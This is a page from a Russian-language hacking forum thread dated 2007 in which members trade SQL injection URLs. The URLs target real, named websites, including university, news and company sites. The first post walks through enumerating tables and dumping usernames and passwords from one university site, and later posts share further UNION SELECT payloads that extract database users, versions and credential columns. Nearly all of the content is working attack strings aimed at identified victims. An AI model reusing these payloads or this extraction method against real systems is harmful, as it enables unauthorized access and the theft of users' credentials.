HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 62 из 1602 « Первая < 1252 58 59 60 61 62 63 64 65 66 721121625621062 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.02.2007, 17:59
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
1) смотрим таблицы
Код:
http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,table_name,3,4,5,6+from+INFORMATION_SCHEMA.TABLES/*
2)Смотрим кол-во в нужных таблицах.
Код:
http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+enroll_accounts/*
Код:
http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+accounts/*
Код:
http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,count(*),3,4,5,6+from+user/*
3)Выводим данные.
Код:
http://research.udmercy.edu/ids/technoclass.php?id=-6%20UNION%20SELECT%201,concat(username,char(58),password),3,4,5,6+from+accounts/*
что тебя заинтересует я не знаю дальшейших методов взлома много дальше разбирайся сам.

in sql i trust )))
 
Ответить с цитированием

  #2  
Старый 27.02.2007, 18:13
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
Дык я это знаю, не совсем уж ламер =) Просто count(*) from users выводит ошибку, а должна выводится по идее пустая страница
Цитата:
http://cat.xula.edu/courses/index.php?mode=view&id=-15+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5
 
Ответить с цитированием

  #3  
Старый 27.02.2007, 20:17
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
Цитата:
http://law.richmond.edu/essaycontests/view.php?record=-12+union+select+1,2,version(),4,5,6,7,8,9,10,11,12
=\
 
Ответить с цитированием

  #4  
Старый 27.02.2007, 21:36
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
__http://baby.com.ua/hit/school/obj_view_otziv.php3?p=view&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21/*
 
Ответить с цитированием

  #5  
Старый 27.02.2007, 22:07
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


По умолчанию
надо внести свой вклад
http://www.a1tv.ru/AOpenBands.php?Band=-1+union+select+1,2,version(),4,user()/*
 
Ответить с цитированием

  #6  
Старый 27.02.2007, 22:16
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


По умолчанию
Цитата:
Сообщение от n1†R0x  
надо внести свой вклад
http://www.a1tv.ru/AOpenBands.php?Band=-1+union+select+1,2,version(),4,user()/*
байан нитрокс
 
Ответить с цитированием

  #7  
Старый 27.02.2007, 22:19
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


По умолчанию
Цитата:
Сообщение от ice1k  
байан нитрокс
"за что ни возьмешься"... я ее сам нашел, честно
ладно, будем копать дальше.. странно, я сёарчем не нашел этот урл(
sorry 4 offtop =\
 
Ответить с цитированием

  #8  
Старый 27.02.2007, 22:44
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
__http://obec.org.ru/author.php?sort=CommentsThread&sort_type=ASC&pos=0 &Id=-1+union+select+1,user(),3,4,5,6,7,8/*
 
Ответить с цитированием

  #9  
Старый 27.02.2007, 22:55
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
По умолчанию
Цитата:
http://www.aiap.it/news.php?ID=-843%20union%20select%201,2,3,4,5,6,7,8/*
Цитата:
http://www.opel.com.cy/news.php?id=1000000000006%20UNION%20SELECT%200,1,2 ,3,4,5,6,7%20from%20users/*
Цитата:
http://www.pzps.pl/news.php?id=290000000000009%20UNION%20SELECT%200,1 ,2,3,4,table_name,6,7,8%20from%20INFORMATION_SCHEM A.TABLES/*
Цитата:
http://www.phpdoc.org/news.php?id=-51%20UNION%20SELECT%200,id,concat(name,char(58),em ail,char(58),password),3,4%20from%20users/*
И вот этот сайт меня зарадовал:
Цитата:
http://www.troagri.com.cn/news.php?id=-8%20UNION%20SELECT%200,1,2,concat(username,char(58 ),email,char(58),password),4,5,6,7,8%20from%20user/*
 
Ответить с цитированием

  #10  
Старый 28.02.2007, 01:17
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
2 _Pantera_
не правда. иногда используя INFORMATION_SCHEMA выводится только одна таблица и тогда надо использовать LIMIT
Но здесь почему то не работает
Цитата:
http://www.solyaris.ru/rinok_hi-fi/statyi_testi_obzory/?part=1+union+select+1,2,3,table_name,5,6,7,8,9,10 ,11,12,13,14,15+from+INFORMATION_SCHEMA.TABLES+lim it+1,1/*
 
Ответить с цитированием
Ответ
Страница 62 из 1602 « Первая < 1252 58 59 60 61 62 63 64 65 66 721121625621062 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.